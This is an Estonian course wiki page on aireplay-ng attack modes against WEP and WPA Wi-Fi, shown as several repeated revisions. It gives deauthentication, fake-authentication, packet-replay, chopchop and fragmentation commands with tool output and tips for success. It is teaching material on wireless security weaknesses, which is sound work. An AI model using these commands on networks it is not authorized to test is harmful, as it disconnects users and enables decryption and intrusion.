Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T18:45:45Z

Tliiv: /* Shared Key Authentication */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
21:40:20 Sending Authentication Request
21:40:20 Authentication successful
21:40:20 Sending Association Request
21:40:20 Association successful :-)
...
</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>...
15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T18:44:34Z

Tliiv: /* Open Authentication */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
